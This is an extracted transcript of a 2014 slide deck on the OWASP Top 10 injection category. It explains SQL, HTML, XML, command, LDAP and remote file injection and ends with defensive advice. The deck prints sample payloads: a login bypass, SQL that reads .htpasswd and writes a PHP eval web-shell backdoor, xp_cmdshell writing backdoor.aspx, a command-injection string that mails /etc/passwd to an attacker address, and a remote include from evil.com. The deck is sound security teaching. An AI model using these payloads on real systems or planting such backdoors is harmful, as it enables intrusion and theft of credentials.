owasp top 10 a1: injection
TRANSCRIPT
![Page 1: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/1.jpg)
Owasp A1: Injection25 Jan 2014: Dubai, UAE.
Michael HendrickxInformation Security Consultant
![Page 2: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/2.jpg)
Owasp Top 10 - 2013• A1: Injection• A2: Broken Authentication and Session Mgmt• A3: Cross Site Scripting• A4: Insecure Direct Object References• A5: Security Misconfiguration• A6: Sensitive Data Exposure• A7: Missing Function Level Access Control• A8: Cross Site Request Forgery• A9: Using Components with Known Vulns• A10: Invalidated Redirects and Forwards
![Page 3: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/3.jpg)
How bad is it?
• Oct ‘13: 100k $ stolen from a California ISPhttp://thehackernews.com/2013/10/hacker-stole-100000-from-users-of.html
• Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone…http://news.softpedia.com/news/RedHack-Breaches-Istanbul-Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml
• Nov ‘12: 150k Adobe user accounts stolenhttp://www.darkreading.com/attacks-breaches/adobe-hacker-says-he-used-sql-injection/240134996
• Jul ‘12: 450k Yahoo! User accounts stolenhttp://www.cbsnews.com/news/yahoo-reportedly-hacked-is-your-account-safe/
![Page 4: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/4.jpg)
What is Injection?
• Web applications became more complex– Database driven– Extra functionality (email, ticket booking, ..)
• Submitting data has a special meaning to underlying technologies
• Types:– SQL Injection– XML Injection– Command Injection
WebWeb
DBDBOSOSBackend System
Backend System
![Page 5: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/5.jpg)
What underlying technologies?
• A webserver parses and “pass on” data
Web ServerWeb Server
http://somesite.com/msg.php?id=8471350
DBDB
OSOS
Script performs business logic and parses messages to backend.“Hey, get me a message from the DB with id 8471350”
![Page 6: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/6.jpg)
SQL Injection: Database Query
• Dynamic script to look up data in DB
Web ServerWeb Server
http://somesite.com/login.aspx?name=michael&password=secret123
DBDB
SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’
http://somesite.com/msg.php?id=8471350
SELECT * FROM messages WHERE id = 8471350
Get indirect access to the database
![Page 7: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/7.jpg)
SQL Injection: Database Query
• Insert value with ’ (single quote)– Single quote is delimiter for SQL queries
Web ServerWeb Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DBDB
Query is incorrectly, will throw error (if not suppressed).
SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
![Page 8: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/8.jpg)
SQL Injection: Database Query
• Insert value with ’ (single quote)– Single quote is delimiter for SQL queries
Web ServerWeb Server
http://somesite.com/login.php?login=mich’ael&password=secret123
DBDB
Query is incorrectly, will throw error (if not suppressed).
SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
![Page 9: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/9.jpg)
SQL Injection: Database Query
• Insert value with ’ (single quote)
Web ServerWeb Server
http://somesite.com/login.php?login=michael&password=test’ OR ’a’ = ’a
DBDB
SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’
‘a’ will always equal ‘a’, and thus log in this user.
![Page 10: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/10.jpg)
SQL Injection: Database Query
• “Direct” access to database• Possible to issue CRUD statements, and more
http://xkcd.com/327/
![Page 11: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/11.jpg)
SQL Injection: Database Query
• More advanced possibilities:– Read files*:• MySQL: SELECT
HEX(LOAD_FILE(‘/var/www/site.com/admin/.htpasswd’)) INTO DUMPFILE ‘/var/www/site.com/htdocs/test.txt’;
• MS SQL: CREATE TABLE newfile(data text);...BULK INSERT newfile FROM ‘C:\secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’);
*: If you have the right privileges
![Page 12: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/12.jpg)
SQL Injection: Database Query
• Write files– MySQL:
CREATE TABLE tmp(data longblog);INSERT INTO tmp(data) VALUES(0x3c3f7068);UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ...SELECT data FROM tmp INTO DUMPFILE ‘/var/www/site.com/htdocs/test.php’;
– MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’);
*: Again, If you have the right privileges
![Page 13: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/13.jpg)
SQL Injection: Database Query
• SQL Map will perform attacks on target.
• Dumps entire tables• Even entire databases.• Stores everything in CSV
• More info on http://sqlmap.org
![Page 14: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/14.jpg)
HTML Injection
• Possible to include HTML tags into fields• Used to render “special” html tags where
normal text is expected• XSS possible,
rewrite theDOM
![Page 15: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/15.jpg)
HTML Injection
• Possible to insert iframes, fake forms, JS, …• Can be used in phishing attack
Button goes to different form, potentially stealing credentials.
![Page 16: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/16.jpg)
XML Injection
• Web app talks to backend web services• Web app’s logic converts parameters to XML
web services (as SOAP, …)
Web ServerWeb ServerWeb serviceWeb service
Web serviceWeb service
DBDB
BackendBackend
![Page 17: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/17.jpg)
XML Injection
http://somesite.com/create.php?name=michael&[email protected]<?xml version=“1.0” encoding=“ISO-8859-1” ?><user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email></user>
http://somesite.com/create.php?name=michael&[email protected]</email><admin>true</admin><email>[email protected]
<?xml version=“1.0” encoding=“ISO-8859-1” ?><user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>[email protected]</email><admin>true</admin><email>[email protected]</email></user>
Web app to create a new user
![Page 18: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/18.jpg)
Command Injection
• Web application performs Operating System tasks– Execute external programs / scripts– List files– Send email
Web ServerWeb Server OSOS
![Page 19: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/19.jpg)
Command Injection
• Dynamic script to share article
Web ServerWeb Server
DBDBhttp://somesite.com/[email protected]
OSOS
$ echo “check this out” | mail –s “share” [email protected]
$ echo “check this out” | mail –s “share” [email protected]; mail [email protected] < /etc/passwd
http://somesite.com/[email protected];[email protected]+<+/etc/passwd
![Page 20: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/20.jpg)
LDAP Injection
• Lightweight Directory Access Protocol• LDAP is used to access information directories– Users– User information– Software– Computers
Web ServerWeb ServerLDAP
ServerLDAP
Server
![Page 21: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/21.jpg)
LDAP Injection
• Insert special characters, such as (, |, &, *, …• * (asterisk) allows listing of all users
http://www.networkdls.com/articles/ldapinjection.pdf
![Page 22: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/22.jpg)
Remote File Injection
• Scripts include other files to extend functionality
• Why? Clarity, Reuse functionality– PHP:• include(), require(), require_once(), …
– Aspx:• <!-- #include “…” -->
– JSP:• <% @include file=“…” %>
![Page 23: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/23.jpg)
Remote File Injection
• Color chooser
• Color will load new file with color codes (blue.php, red.php, …)
• Attacker can upload malicious PHP file to an external server
http://somesite.com/mypage.php?color=blue
<?php if(isset($_GET[‘color’])){ include($_GET[‘color’].‘.php’); }?>
http://somesite.com/mypage.php?color=http://evil.com/evil.txt?
![Page 24: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/24.jpg)
Remote (HTML) File Injection
• Theme chooser
• Can input external HTML files– That can contain JavaScript, XSS, rewrite the
DOM, etc...
• Also verify cookie contents, …
http://somesite.com/set_theme.php?theme=fancy
<link href=“/themes/<? print $_COOKIE[‘theme’] ?>.css” rel=“stylesheet” type=“text/css” />
![Page 25: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/25.jpg)
Protect against Injection Attacks (1)
• Implement Web Application Firewall (WAF)• Prevents most common attacks– Not 100% foolproof
• Make sure it can decrypt SSL
Web ServerWeb Server DBDBWAFWAF
![Page 26: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/26.jpg)
Protect against Injection Attacks (2)
• Validate user input, all input:– Never trust user input, ever.– Even stored input (for later use)– Force formats (numbers, email addresses, dates…)– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards– Use prepared SQL statements– Vendor specific guidelines– OWASP secure coding practices:
https://www.owasp.org/images/0/08/OWASP_SCP_Quick_Reference_Guide_v2.pdf
![Page 27: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/27.jpg)
Protect against Injection Attacks (3)
• Adopt least-privilege policies– Give DB users least privileges– Use multiple DB users– Run processes with restricted privileges– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment• Suppress error messages• Enable exception notifications– If something strange happens, reset session and
notify administrator.
![Page 28: Owasp Top 10 A1: Injection](https://reader034.vdocument.in/reader034/viewer/2022050613/58eeb5ec1a28abaf628b45cd/html5/thumbnails/28.jpg)
So what’s next?
• Don’t trust your user input.• Don’t trust your user input.• Adopt secure coding policies• Implement defense in depth• Do log analysis to detect anomalies• And don’t trust your user input.